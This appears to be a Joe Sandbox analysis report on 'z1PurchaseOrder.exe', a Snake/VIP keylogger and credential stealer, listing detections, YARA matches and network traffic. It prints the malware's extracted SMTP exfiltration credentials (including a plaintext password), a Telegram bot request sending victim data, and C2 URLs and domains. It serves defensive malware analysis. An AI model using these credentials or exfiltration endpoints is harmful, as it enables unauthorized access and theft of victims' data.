Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
z1PurchaseOrder.exe

Overview

General Information

Sample name:z1PurchaseOrder.exe
Analysis ID:1525492
MD5:3ebef42f57673d6b260644654522b053
SHA1:b63d68467a9be1260af9685b71eb8b54680e85d6
SHA256:7ffba279d6f47ed76230be9dc7baae15b923dc09ba48f738d01e9beab32e9a58
Tags:exeuser-Porcupine
Infos:

Detection

PureLog Stealer, Snake Keylogger, VIP Keylogger
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected PureLog Stealer
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
.NET source code contains method to dynamically call methods (often used by packers)
AI detected suspicious sample
Contains functionality to detect sleep reduction / modifications
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Maps a DLL or memory area into another process
Switches to a custom stack to bypass stack traces
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Writes to foreign memory regions
Yara detected Generic Downloader
Abnormal high CPU Usage
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
OS version to string mapping found (often used in BOTs)
PE file contains an invalid checksum
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Suspicious Outbound SMTP Connections
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • z1PurchaseOrder.exe (PID: 7416 cmdline: "C:\Users\user\Desktop\z1PurchaseOrder.exe" MD5: 3EBEF42F57673D6B260644654522B053)
    • RegSvcs.exe (PID: 7456 cmdline: "C:\Users\user\Desktop\z1PurchaseOrder.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger
{"Exfil Mode": "SMTP", "Email ID": "operations@starofseasmarine.com", "Password": "Dontforget2015", "Host": "mail.starofseasmarine.com", "Port": "587", "Version": "4.4"}
{"Exfil Mode": "SMTP", "Username": "operations@starofseasmarine.com", "Password": "Dontforget2015", "Host": "mail.starofseasmarine.com", "Port": "587", "Version": "4.4"}
SourceRuleDescriptionAuthorStrings
00000000.00000002.1696353856.0000000000B20000.00000004.00001000.00020000.00000000.sdmpMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
  • 0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
  • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
  • 0x700:$s3: 83 EC 38 53 B0 B4 88 44 24 2B 88 44 24 2F B0 DC 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
  • 0x1ed8a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
  • 0x1e9d0:$s5: delete[]
  • 0x1de88:$s6: constructor or from DllMain.
00000001.00000002.4133626873.0000000000400000.00000040.80000000.00040000.00000000.sdmpMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
  • 0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
  • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
  • 0x1300:$s3: 83 EC 38 53 B0 B4 88 44 24 2B 88 44 24 2F B0 DC 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
  • 0x2018a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
  • 0x1fdd0:$s5: delete[]
  • 0x1f288:$s6: constructor or from DllMain.
00000001.00000002.4136012994.0000000003271000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
    00000001.00000002.4139815976.0000000005A50000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000001.00000002.4139815976.0000000005A50000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
        Click to see the 25 entries
        SourceRuleDescriptionAuthorStrings
        1.2.RegSvcs.exe.400000.0.raw.unpackMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
        • 0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
        • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
        • 0x1300:$s3: 83 EC 38 53 B0 B4 88 44 24 2B 88 44 24 2F B0 DC 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
        • 0x2018a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
        • 0x1fdd0:$s5: delete[]
        • 0x1f288:$s6: constructor or from DllMain.
        0.2.z1PurchaseOrder.exe.b20000.1.raw.unpackMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
        • 0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
        • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
        • 0x700:$s3: 83 EC 38 53 B0 B4 88 44 24 2B 88 44 24 2F B0 DC 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
        • 0x1ed8a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
        • 0x1e9d0:$s5: delete[]
        • 0x1de88:$s6: constructor or from DllMain.
        1.2.RegSvcs.exe.400000.0.unpackMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
        • 0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
        • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
        • 0x700:$s3: 83 EC 38 53 B0 B4 88 44 24 2B 88 44 24 2F B0 DC 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
        • 0x1ed8a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
        • 0x1e9d0:$s5: delete[]
        • 0x1de88:$s6: constructor or from DllMain.
        1.2.RegSvcs.exe.5890000.4.raw.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          1.2.RegSvcs.exe.5890000.4.raw.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
            Click to see the 73 entries

            System Summary

            barindex
            Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 166.62.28.135, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Initiated: true, ProcessId: 7456, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49754
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-10-04T10:32:04.314897+020028033053Unknown Traffic192.168.2.449732188.114.97.3443TCP
            2024-10-04T10:32:12.896170+020028033053Unknown Traffic192.168.2.449742188.114.97.3443TCP
            2024-10-04T10:32:15.379669+020028033053Unknown Traffic192.168.2.449746188.114.97.3443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-10-04T10:32:02.402512+020028032742Potentially Bad Traffic192.168.2.449730158.101.44.24280TCP
            2024-10-04T10:32:03.746273+020028032742Potentially Bad Traffic192.168.2.449730158.101.44.24280TCP
            2024-10-04T10:32:05.965066+020028032742Potentially Bad Traffic192.168.2.449733158.101.44.24280TCP

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: http://aborters.duckdns.org:8081URL Reputation: Label: malware
            Source: http://anotherarmy.dns.army:8081URL Reputation: Label: malware
            Source: 00000001.00000002.4136012994.0000000003271000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "operations@starofseasmarine.com", "Password": "Dontforget2015", "Host": "mail.starofseasmarine.com", "Port": "587", "Version": "4.4"}
            Source: 1.2.RegSvcs.exe.5a50000.5.raw.unpackMalware Configuration Extractor: VIP Keylogger {"Exfil Mode": "SMTP", "Email ID": "operations@starofseasmarine.com", "Password": "Dontforget2015", "Host": "mail.starofseasmarine.com", "Port": "587", "Version": "4.4"}
            Source: z1PurchaseOrder.exeReversingLabs: Detection: 50%
            Source: z1PurchaseOrder.exeVirustotal: Detection: 45%Perma Link
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Source: z1PurchaseOrder.exeJoe Sandbox ML: detected

            Location Tracking

            barindex
            Source: unknownDNS query: name: reallyfreegeoip.org
            Source: z1PurchaseOrder.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49731 version: TLS 1.0
            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49748 version: TLS 1.2
            Source: Binary string: _.pdb source: RegSvcs.exe, 00000001.00000002.4135278141.0000000002EA9000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4139426145.0000000005890000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: wntdll.pdbUGP source: z1PurchaseOrder.exe, 00000000.00000003.1694686446.0000000004610000.00000004.00001000.00020000.00000000.sdmp, z1PurchaseOrder.exe, 00000000.00000003.1693630729.00000000047B0000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: z1PurchaseOrder.exe, 00000000.00000003.1694686446.0000000004610000.00000004.00001000.00020000.00000000.sdmp, z1PurchaseOrder.exe, 00000000.00000003.1693630729.00000000047B0000.00000004.00001000.00020000.00000000.sdmp
            Source: C:\Users\user\Desktop\z1PurchaseOrder.exeCode function: 0_2_00452126 FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00452126
            Source: C:\Users\user\Desktop\z1PurchaseOrder.exeCode function: 0_2_0045C999 FindFirstFileW,FindNextFileW,FindClose,0_2_0045C999
            Source: C:\Users\user\Desktop\z1PurchaseOrder.exeCode function: 0_2_00436ADE GetFileAttributesW,FindFirstFileW,FindClose,0_2_00436ADE
            Source: C:\Users\user\Desktop\z1PurchaseOrder.exeCode function: 0_2_00434BEE FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00434BEE
            Source: C:\Users\user\Desktop\z1PurchaseOrder.exeCode function: 0_2_00436D2D FindFirstFileW,CreateFileW,SetFileTime,CloseHandle,SetFileTime,CloseHandle,0_2_00436D2D
            Source: C:\Users\user\Desktop\z1PurchaseOrder.exeCode function: 0_2_00442E1F SetCurrentDirectoryW,FindFirstFileW,SetCurrentDirectoryW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00442E1F
            Source: C:\Users\user\Desktop\z1PurchaseOrder.exeCode function: 0_2_0045DD7C FindFirstFileW,FindClose,0_2_0045DD7C
            Source: C:\Users\user\Desktop\z1PurchaseOrder.exeCode function: 0_2_0044BD29 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,0_2_0044BD29
            Source: C:\Users\user\Desktop\z1PurchaseOrder.exeCode function: 0_2_00475FE5 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_00475FE5
            Source: C:\Users\user\Desktop\z1PurchaseOrder.exeCode function: 0_2_0044BF8D _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0044BF8D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov dword ptr [ebp-20h], 00000000h1_2_02FFD5C8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0593ECF5h1_2_0593EB18
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0593F67Fh1_2_0593EB18
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h1_2_0593E65B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h1_2_0593E028
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0593DB05h1_2_0593D947
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h1_2_0593E83B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0593DB05h1_2_0593DB54

            Networking

            barindex
            Source: unknownDNS query: name: api.telegram.org
            Source: Yara matchFile source: 1.2.RegSvcs.exe.5890000.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.RegSvcs.exe.5a50000.5.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.RegSvcs.exe.5890ee8.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.RegSvcs.exe.2ee9896.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.RegSvcs.exe.2eea77e.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000001.00000002.4139815976.0000000005A50000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.4139426145.0000000005890000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
            Source: global trafficTCP traffic: 192.168.2.4:49754 -> 166.62.28.135:587
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:724536%0D%0ADate%20and%20Time:%2006/10/2024%20/%2022:42:27%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20724536%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
            Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
            Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
            Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
            Source: Joe Sandbox ViewASN Name: TELEGRAMRU TELEGRAMRU
            Source: Joe Sandbox ViewASN Name: AS-26496-GO-DADDY-COM-LLCUS AS-26496-GO-DADDY-COM-LLCUS
            Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
            Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
            Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
            Source: unknownDNS query: name: checkip.dyndns.org
            Source: unknownDNS query: name: reallyfreegeoip.org
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49733 -> 158.101.44.242:80
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49730 -> 158.101.44.242:80
            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49742 -> 188.114.97.3:443
            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49746 -> 188.114.97.3:443
            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49732 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.4:49754 -> 166.62.28.135:587
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49731 version: TLS 1.0
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: C:\Users\user\Desktop\z1PurchaseOrder.exeCode function: 0_2_0044289D InternetQueryDataAvailable,InternetReadFile,0_2_0044289D
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:724536%0D%0ADate%20and%20Time:%2006/10/2024%20/%2022:42:27%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20724536%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
            Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
            Source: global trafficDNS traffic detected: DNS query: api.telegram.org
            Source: global trafficDNS traffic detected: DNS query: mail.starofseasmarine.com
            Source: global trafficDNS traffic detected: DNS query: 15.164.165.52.in-addr.arpa
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Fri, 04 Oct 2024 08:32:16 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
            Source: RegSvcs.exe, 00000001.00000002.4136012994.000000000337F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?L
            Source: RegSvcs.exe, 00000001.00000002.4135278141.0000000002EA9000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4139815976.0000000005A50000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4139426145.0000000005890000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
